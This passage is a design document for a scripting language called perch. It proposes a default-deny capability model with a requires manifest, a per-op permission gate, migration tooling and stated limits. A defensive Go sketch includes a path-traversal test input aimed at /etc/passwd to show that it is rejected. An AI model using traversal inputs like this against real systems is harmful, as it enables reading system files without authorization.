    log = git log --oneline
    fixes =
      pipe_value log               # proposed: thread a value through line transforms
        | grep "fix"
        | head 5
      end
    # or, with today's ops only:
    lines = split "${log}" "\n"
    for_each lines l
      if contains l "fix"
        print l
      end
    end
The line ops (lines/grep/cut/head/tail/sort_lines/uniq_lines/count_lines) are all pure ops (string→string, no capability); they need no grant and compose with | on values.
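Because these ops are pure string-to-string functions, they are simple to model. The Python sketch below mirrors the argument order from the table (pattern or count first, text last); the exact semantics chosen here (regex search for grep, 1-based fields for cut, adjacent-duplicate removal for uniq_lines) are assumptions borrowed from the shell tools they replace, not a statement of perch's behavior.

```python
import re


def _lines(text):
    return text.splitlines()


def grep(pattern, text):
    """Keep lines that match the regex."""
    return "\n".join(l for l in _lines(text) if re.search(pattern, l))


def reject(pattern, text):
    """Drop lines that match the regex (grep -v)."""
    return "\n".join(l for l in _lines(text) if not re.search(pattern, l))


def cut(field, text, sep=None):
    """Pick a 1-based field; sep=None splits on runs of whitespace."""
    picked = []
    for l in _lines(text):
        parts = l.split(sep)
        picked.append(parts[field - 1] if field <= len(parts) else "")
    return "\n".join(picked)


def head(n, text):
    return "\n".join(_lines(text)[:n])


def tail(n, text):
    return "\n".join(_lines(text)[-n:] if n > 0 else [])


def sort_lines(text):
    return "\n".join(sorted(_lines(text)))


def uniq_lines(text):
    """Collapse adjacent duplicate lines, like uniq."""
    kept = []
    for l in _lines(text):
        if not kept or kept[-1] != l:
            kept.append(l)
    return "\n".join(kept)


def count_lines(text):
    return len(_lines(text))


log = "a1 fix typo\nb2 add feature\nc3 fix crash\nc3 fix crash"
fixes = head(1, grep("fix", log))
```

Composition is ordinary function nesting: `head(1, grep("fix", log))` plays the role of `grep fix | head -1`, with no process and no capability involved.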
Process composition: prefer native over piping to a tool
The most ergonomic move is often to skip the external tool entirely. perch ships json_parse / json_get / json_count, so the classic … | jq is frequently unnecessary:
    # bash: kubectl get pods -o json | jq -r '.items[0].metadata.name'
    raw = kubectl get pods -o json
    name = json_get "${raw}" ".items[0].metadata.name"   # no jq, no pipe, no second bin to declare
When you do compose tools, do it with managed pipes (above), && / || (§3.3), with_exec (§3.4), and for_each over captured lists: every step a declared bin, every wire owned by perch.
JSON / text ergonomics (mostly exists)
The building blocks shipping today:
    body = curl -s https://api.github.com/repos/me/app     # (curl declared)
    stars = json_get "${body}" ".stargazers_count"
    topics = json_count "${body}" ".topics"
    print "${stars} stars, ${topics} topics"
    # text munging without sed/awk:
    csv = read_file data "report.csv"
    rows = csv_parse csv                                    # exists
    first = split (slice rows 0 1) ","                      # first row → fields
    # build JSON safely (single-quote delimiter avoids escaping the "):
    payload = format '{"name":"${name}","count":${count}}'
    "${payload}" | exec http post-helper                    # or use http_post directly
json_parse · json_get (path) · json_count · json_stringify · csv_parse · split / join · regex_* · format · trim / lower / upper are all pure: no capability, no shell, cross-platform identical.
Summary β what ships when¶
| Primitive | Status |
|---|---|
| exec of a declared bin with structured argv | ships (core of §3.2): exec BIN tok…; bare flags/paths unquoted, quote only tokens with spaces |
| pipe … end block (stdout→stdin between exec stages, no shell) | ships: out = pipe … end captures the final stage |
| glob | ships (read-scoped) |
| grep / reject / cut / head / tail / sort_lines / uniq_lines / count_lines | ships (pure ops) |
| && / \|\| / ; between execs | proposed (§3.3) |
| with_exec BIN … end | proposed (§3.4) |
| \| inline pipe operator + string-on-left (stdin feed) | proposed (the pipe … end block ships; the inline \| operator does not) |
| split / join / slice / regex_match / regex_replace / regex_find_all / length / contains / format / trim / lower / upper | exists |
| json_parse / json_get / json_count / json_stringify / csv_parse | exists |
| read_file / write_file / walk_dir / list_dir / for_each | exists |
The through-line: perch already has the value-manipulation half of the shell toolbox (string/JSON/regex/list ops are pure and shipping). The process half is partly there: exec, the pipe … end block, and the line-oriented sugar ship, while the inline |/&&/|| operators and with_exec are still proposed. All of it is perch-managed, so the shell's syntax survives while the shell itself, and its injection surface, does not.
4. Enforcement model¶
One new layer in the interpreter: a capability check before every op dispatch.
for each op about to run:
    cap := capabilityOf(op.Kind, op.Args)       // from the classification table (§2)
    if cap == None: proceed
    if program.Grants.Permits(cap, op.Args): proceed
    else: return *_not_permitted error          // typed, matchable in try/rescue
- Default-deny. program.Grants is built solely from the requires block. Empty block (or no block) → permits nothing effectful.
- Path checks canonicalize then prefix/glob-match against read/write roots.
- Host checks reuse today's allowlist logic.
- Operator flags still compose AND-wise. --no-network at launch can further restrict below what the file declared, but can never grant beyond it. The file's requires is the ceiling; operator flags lower it. Neither can exceed the other: same intersection model perch already uses, but now the file's side defaults to nothing instead of everything.
New error kinds: shell_not_permitted, read_not_permitted, write_not_permitted, net_not_permitted, env_not_permitted, subprocess_not_permitted. They join the existing bin_not_declared / host_not_declared / env_not_declared (which become the finer-grained failures once the capability itself is permitted). The named-handle layer (§3.1) adds two static kinds surfaced by perch --check: unknown_capability (a handle that was never declared) and capability_kind_mismatch (a handle used in the wrong position).
5. Where this differs from today (gap analysis)¶
| Dimension | Today | Target |
|---|---|---|
| Default authority | Ambient: everything (shell, fs, net, env all work) | Zero: nothing works until declared |
| requires block | Opt-in (enforces only when present) | Mandatory semantics (absence = deny-all) |
| Shell | On by default; --no-shell to remove | Off by default; shell { … } to add |
| Filesystem | On by default, whole disk; --no-write / write-roots to narrow | Off by default; read/write per-path to add |
| Network | On by default (SSRF-guarded); --allow-host to pin | Off by default; net { host … } to add |
| Env | All host env visible; --env A,B to narrow | Nothing visible; env "A" to add |
| Who sets the policy | The operator, at launch, via flags | The author, in the file, by declaration (operator can only tighten) |
| Enforcement point | Scattered (per-op restriction layer, opt-in) | One capability gate, every op, always |
The pieces already in place that this builds on: the requires parser + domain types, the bin_not_declared / host_not_declared / env_not_declared runtime guards, the static perch --check enforcement, the HTTP SSRF/allowlist layer, the sandbox block's static checker, and the per-op restriction hooks (ApplyRestrictions). The work is to unify them under one default-deny gate and extend coverage to filesystem paths and the shell/net capability switches.
6. What would have to change: code¶
Concrete, by VHCO layer:
domain/program.go: extend Requirements:
type Requirements struct {
	Declared   bool
	Shell      bool      // `shell` capability permitted at all
	Net        bool      // `net` capability permitted at all
	Subprocess bool
	Bins       []BinReq  // (exists)
	Hosts      []HostReq // (exists)
	Envs       []EnvReq  // (exists)
	ReadRoots  []string  // NEW: allowed read path scopes
	WriteRoots []string  // NEW: allowed write path scopes
	OS, Arch   []string  // (exists)
}
domain/capability.go (new): the op→capability classification table + a Grants.Permits(cap, args) method. This is the single source of truth for "what does op X need."
domain/errors.go: add the six *_not_permitted kinds.
infra/capyloader/lib.capy + loader.go: grammar for shell { bin … }, net { host … }, read "…" …, write "…" …, subprocess. (The two-level shell/net blocks reuse the existing block-event machinery.)
infra/interpreter/interpreter.go: the pre-dispatch capability gate (§4). One function, called from RunOp before the handler. Reads i.Program.Requirements; honors the AND-with-operator-flags rule.
infra/ops/*: every effectful op tagged with its capability (a map[string]Capability registered alongside handlers). Most ops already return tagged errors; this adds the pre-flight gate so they never run when denied.
io/cli + orchestrator: flags (--no-shell etc.) move from "remove ambient capability" to "lower the file's ceiling further." A new flag like --ambient (or --legacy) re-enables the old all-access default for migration (see §8).
usecases/validate: --check already flags undeclared literal bins/hosts/env; extend it to flag undeclared capabilities (a literal read_file "./x" with no read grant) statically.
usecases/scan + simulate: both already model capabilities; they consume the richer manifest instead of inferring from op usage.
7. What would have to change: docs & GH Pages¶
This is a framing inversion, not just new pages. Every place that says "perch can do X; restrict with --no-X" must flip to "perch can do nothing; grant X with a requires block."
- docs/index.md (GH Pages home): the hero and the "For platform / SRE / security teams" grid currently lead with capability gating via CLI flags. Reframe the headline security story as default-deny / zero ambient authority, with the CLI flags demoted to "tighten further." The requires chip already exists; it becomes the centerpiece, not a footnote.
- docs/sandbox.md: the biggest rewrite. Today it explains the capability model as operator-applied flags with an ambient-everything default. It must invert: the file declares, the default is nothing, the operator can only subtract. The "who writes the sandbox" section (author declares / user grants / runtime enforces the intersection) stays, but the default moves from "everything" to "nothing," which is the whole point.
- Every code example with an effectful op (shell, mkdir, read_file, http_get, cp, etc.) needs a requires block, or it's now a non-runnable example. This touches guide.md, applications.md, op-reference.md, the tutorials, recipes/*, and the demos. (The recent pass added requires to flagship examples and 13 recipes; under this model it becomes mandatory for all of them.)
- docs/requires.md: expand from "declare bins/hosts/env" to "the complete capability manifest," documenting shell / net / read / write / subprocess.
- docs/op-reference.md: annotate every op with the capability it requires (a column), so readers see at a glance which ops are pure and which need a grant.
- docs/errors.md: document the six *_not_permitted kinds.
- docs/migrating-from-shell.md + a new migration note: the "wrap your bash in a shell op" first step now also requires declaring the shell capability + the bins, so the wrap step gains one block.
- mkdocs.yml: add this doc to nav; reorder so the default-deny story is near the top.
- README.md: the "What perch is / isn't" and the hero need the same inversion as the GH home.
8. Breaking-change strategy¶
This is the largest breaking change perch could make: every existing .perch file that touches anything external stops working until it declares. That must be handled deliberately.
- Gate behind a major version. Default-deny ships in (say) perch 1.0; 0.x keeps ambient-default. SemVer makes the break legible.
- A transition flag. perch --ambient (and PERCH_AMBIENT=1) re-enables the old all-access default for one release cycle, with a deprecation warning printed on every run. CI can flip it off to find what breaks.
- A codemod / generator. perch --infer-requires FILE walks the program, collects every effectful op + the literal paths/bins/hosts it uses, and emits a requires block the author can paste in and tighten. This is the single most important ergonomic lever; see §9.
- --check becomes the migration tool. Run it, get the exact list of undeclared capabilities, add them. Wire into pre-commit so new files are born declared.
9. Ergonomics: making the narrow path the easy path¶
Every default-deny system that failed (Android pre-6, npm, browser permissions) failed because granting broadly was easier than granting narrowly. perch must make the opposite true:
- perch --infer-requires generates a tight manifest from real usage: paths as exact roots, bins as exact names, hosts as exact domains. The author starts narrow and only widens deliberately.
- Declaring narrow is one line. read "./src" is shorter than reasoning about it. Declaring broad (read "/") is visibly alarming in review and flagged HIGH by --scan.
- --check tells you exactly what's missing, with the exact line to add. The feedback loop is: write op → check → paste the suggested grant.
- Pure programs need no block at all. A .perch that only transforms strings / JSON / hashes just works with zero ceremony; the ceremony scales with the danger.
10. Honest limits¶
- This is in-process capability gating, not a kernel sandbox. perch enforces the manifest by refusing to dispatch a denied op. It is airtight only if every op is correctly classified (§2) and there's no op that reaches the outside world without going through the gate. A misclassified op is a hole. For genuinely adversarial code, still layer an OS sandbox (firejail / sandbox-exec / a container), and for untrusted logic, compile it to WASM and run it under wasm_run (see trust-by-manifest.md), where the boundary is the WASM runtime, not perch's op table.
- shell is a megacapability. Once you grant shell + a bin, that bin can do anything it can do. perch gates which bin runs, not what the bin then does. The hash pin (bin "x" hash "…") and --no-shell-metachars reduce, but don't eliminate, this. Prefer native ops over shell so shell can stay ungranted.
- Filesystem path matching is prefix/glob, not a chroot. Symlinks out of an allowed root, TOCTOU between check and use, and .. traversal must be handled in the path canonicalizer or the guarantee leaks.
- It does not make incorrect code correct. It bounds the blast radius of bugs and malice; it does not prevent logic errors within granted capabilities.
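The path-matching caveat is easier to see in code. The Go sketch below shows one way a canonicalizer could reject `..` traversal and the "sibling prefix" pitfall; `withinRoot` is a hypothetical helper, not perch's canonicalizer. It is purely lexical: it does not resolve symlinks (a real check would likely call `filepath.EvalSymlinks` on both paths first) and it does nothing about TOCTOU between check and use.

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// withinRoot reports whether target, after lexical cleaning, stays inside
// root. It compares path components via filepath.Rel rather than raw string
// prefixes, so "/srv/application" is not mistaken for a child of "/srv/app".
func withinRoot(root, target string) bool {
	root = filepath.Clean(root)
	target = filepath.Clean(target) // collapses "a/../b" and duplicate separators
	rel, err := filepath.Rel(root, target)
	if err != nil {
		return false // e.g. one path absolute, the other relative
	}
	// A relative path that climbs out of root starts with a ".." component.
	return rel != ".." && !strings.HasPrefix(rel, ".."+string(filepath.Separator))
}

func main() {
	root := "/srv/app"
	for _, p := range []string{
		"/srv/app/src/main.go",
		"/srv/app/../etc/passwd",
		"/srv/application/secrets",
	} {
		fmt.Printf("%-28s allowed=%v\n", p, withinRoot(root, p))
	}
}
```

A naive `strings.HasPrefix(target, root)` would accept the last two paths in `main`, which is the kind of leak the bullet above warns about.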
11. Phased plan¶
1. Capability classification + gate (no default change yet). Add domain/capability.go, the interpreter gate, and the *_not_permitted errors, but keep the default ambient so nothing breaks. The gate is a no-op until a flag turns it on. Ship + test.
2. Filesystem read/write scopes in requires. Grammar + loader + path canonicalizer + enforcement. Still opt-in.
3. shell { bin … } / net { host … } two-level capability switches. Fold the existing bin/host allowlists under them.
4. Named handles (§3.1). as NAME in requires, handle-position resolution in exec / read_file / http_get / get_env, and the unknown_capability / capability_kind_mismatch static checks. Non-breaking: string forms keep working; handles are the recommended sugar.
5. perch --infer-requires generator + --check capability coverage. The migration toolchain, before the default flips. The generator can emit named handles directly.
6. Flip the default to deny, behind perch 1.0 + --ambient escape hatch. Docs/GH-Pages inversion lands with this. Deprecation cycle for --ambient.
7. Remove --ambient. Zero ambient authority is the only mode.
Phases 1–5 are non-breaking and independently shippable. Phase 6 is the inversion. Phase 7 is the end state: a perch program has absolutely zero access to external resources except what it declares, no exceptions.
See also¶
- docs/requires.md: the manifest as it exists today (bins / hosts / env + version + hash pins)
- docs/sandbox.md: the current capability model (operator-applied flags) that this inverts
- docs/trust-by-manifest.md: the same default-deny idea applied to embedded WASM modules
- docs/errors.md: error-kind enum (where the *_not_permitted kinds would live)